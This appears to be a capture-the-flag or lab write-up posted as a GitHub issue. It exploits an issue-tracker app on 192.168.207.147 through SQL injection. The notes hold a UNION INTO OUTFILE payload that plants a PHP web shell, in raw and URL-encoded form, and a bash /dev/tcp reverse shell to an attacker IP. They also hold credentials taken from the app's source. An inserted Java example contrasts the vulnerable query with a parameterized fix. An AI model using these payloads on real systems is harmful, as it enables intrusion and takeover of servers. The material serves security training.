Open WDavid404 opened 4 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.4 (protocol 2.0)
17445/tcp open unknown syn-ack ttl 61
30455/tcp open http syn-ack ttl 61 nginx 1.18.0
|_http-title: W3.CSS
|_http-server-header: nginx/1.18.0
50080/tcp open http syn-ack ttl 61 Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
17445/tcp web page: register a new user (admin:password) and login /user/list --> clinton dummy
30455/tcp /phpinfo.php --> /etc/php7/php.ini /etc/php7/conf.d
50080/tcp: /cloud/index.php/login --> nextcloud 20.0.7 --> didn't find useful exploit info
admin:admin can log in successfully
Download issuetracker.zip file
unzip it
“/issue/checkByPriority” directory
In /src/main/java/com/issue/tracker/issues/IssueController.java
--> Credentials User “issue_user” and password “ManagementInsideOld797”
---> vulnerable to SQL injection: String query = "SELECT message FROM issue WHERE priority='"+priority+"'";
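The root cause in IssueController.java is string concatenation of the caller-controlled priority parameter into SQL text. The following is an added example (not the issuetracker project's own code) that places that vulnerable pattern beside the parameterized fix; it assumes a plain JDBC Connection and the issue(message, priority) table the query above implies. The later INTO OUTFILE step only works because the database account also holds the FILE privilege and can write into /srv/http, so a least-privilege DB user and MySQL/MariaDB's secure_file_priv are the second layer of defense.

```java
// Added example, not the project's code. Assumes a JDBC Connection and an
// "issue" table with columns message and priority, as on the page.
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

public class IssueRepository {

    private final Connection conn;

    public IssueRepository(Connection conn) {
        this.conn = conn;
    }

    // Vulnerable pattern from the writeup: the caller-controlled value is spliced
    // into SQL text, so a single quote in "priority" closes the literal and the
    // remainder of the input is parsed as SQL (UNION SELECT ... INTO OUTFILE).
    public List<String> checkByPriorityUnsafe(String priority) throws SQLException {
        String query = "SELECT message FROM issue WHERE priority='" + priority + "'";
        List<String> out = new ArrayList<>();
        try (Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery(query)) {
            while (rs.next()) {
                out.add(rs.getString("message"));
            }
        }
        return out;
    }

    // Fixed: the SQL text is constant and the value travels as a bound parameter,
    // so quotes, comment markers and keywords in the input are treated as data only.
    public List<String> checkByPriority(String priority) throws SQLException {
        String query = "SELECT message FROM issue WHERE priority = ?";
        List<String> out = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(query)) {
            ps.setString(1, priority);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    out.add(rs.getString("message"));
                }
            }
        }
        return out;
    }
}
```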
http://192.168.207.147:30455/phpinfo.php shows that “/srv/http” is the 30455 web server’s root directory
Log in to http://192.168.207.147:17445/login --> The title is "Issue Tracker". Based on the "@GetMapping" info in the pic above, the POST method is allowed --> Try POST http://192.168.207.147:17445/issue/checkByPriority, got a 400 response, so this path is valid.
Use SQL query ' union select '<?php echo system($_REQUEST["bingo"]); ?>' into outfile '/srv/http/cmd.php' -- -
(Need to use URL encode)
Note: The cookie must be valid (after login)
%27%20union%20select%20%27%3C%3Fphp%20echo%20system%28%24_REQUEST%5B%22bingo%22%5D%29%3B%20%3F%3E%27%20into%20outfile%20%27%2Fsrv%2Fhttp%2Fcmd.php%27%20--%20-
Access http://192.168.207.147:30455/cmd.php?bingo=whoami -->it works
Let's run bash -c 'bash -i >& /dev/tcp/192.168.45.180/443 0>&1'
http://192.168.207.147:30455/cmd.php?bingo=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.180%2F443%200%3E%261%27
Note: The server only allows port 443, so run a python server on the same port to download the reverse shell code to the attacking machine.
Key points:
' union select '<?php echo system($_REQUEST["bingo"]); ?>' into outfile '/srv/http/cmd.php' -- -